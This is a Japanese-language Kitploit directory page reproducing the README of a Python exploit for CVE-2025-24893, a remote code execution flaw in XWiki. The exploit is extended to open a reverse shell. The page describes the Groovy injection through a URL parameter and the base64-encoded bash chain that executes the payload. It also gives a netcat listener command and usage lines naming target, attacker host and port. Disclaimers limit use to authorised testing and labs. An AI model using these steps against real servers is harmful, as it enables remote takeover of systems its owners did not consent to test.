Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 XWikiのリバースシェル機能付きRCEエクスプロイト | Kitploit
ツール/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 XWikiのリバースシェル機能付きRCEエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
361年前未レビュー

CVE-2025-24893 XWiki用リバースシェルエクスプロイト

免責事項: このスクリプトは教育目的および許可されたセキュリティテストのみを意図しています。所有していない、または明示的なテスト許可がないシステムでは使用しないでください。悪用は違法かつ危険です。

説明

このPythonスクリプトは、XWikiバージョン15.10.10までに影響するリモートコード実行脆弱性CVE-2025-24893を悪用します。

  • テスト済みバージョン: XWiki 15.10.8
  • 影響: ターゲットサーバー上での任意のコマンド実行を許可します。
  • Pythonバージョン: Python 3 で作成・テスト済み

このバージョンは、Al Baradi Joyによる元のPoCを拡張し、リバースシェルを起動します。元のPoCはこちらにあります。

動作原理

  • XWikiはURLパラメータを介してGroovyコードを実行します。

  • このエクスプロイトは、Groovyテンプレートに**bash -cコマンド**を注入します。

  • 通常のリバースシェルには複数の引用符(' および ")が含まれており、Groovyの評価とURLを壊してしまいます。

  • これを解決するために、スクリプトはワンライナーシェルコマンドをBase64でエンコードします。

  • ペイロードはURLで送信され、以下のチェーンを使用して実行されます:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • これによりBase64ペイロードが安全にデコードされ、bash -iで実行され、インタラクティブなリバースシェルが得られます。

ターゲットURLの形式

  • 形式: http://<target-host>
  • 含めないでください:
    • 末尾のスラッシュ /
    • /xwikiパス(スクリプトが自動的に追加します)

例:

root@kitploit:~
# Correct
http://10.129.95.114:8080
http://example.com:8080

# Incorrect
http://10.129.95.114:8080/         # trailing slash
http://example.com/xwiki            # includes /xwiki

リスナーのセットアップ

エクスプロイトを実行する前に、リバースシェルを受信するためにマシンでリスナーを起動する必要があります。

Netcatを使用した例:

root@kitploit:~
nc -lvnp <lport>
  • <lport>はスクリプトの引数として指定するポートと一致する必要があります。

使用方法

root@kitploit:~
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

例:

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • スクリプトは完全なエクスプロイトURL、Base64ペイロード、およびリスナー確認手順を出力します。

参考文献

  • GHSAアドバイザリ
  • XWikiホームページ
  • 元のPoCはAl Baradi Joyによる。

クレジット

  • 元のProof-of-Concept: Al Baradi Joy
  • このバージョン: インタラクティブなコマンド実行のためのリバースシェル起動に対応

警告

  • このエクスプロイトは管理された環境(HTB、ラボマシン、自分が所有するVM)のみで使用してください。
  • 公開サーバーでの無許可使用は違法であり、刑事告発される可能性があります。
ツールをダウンロード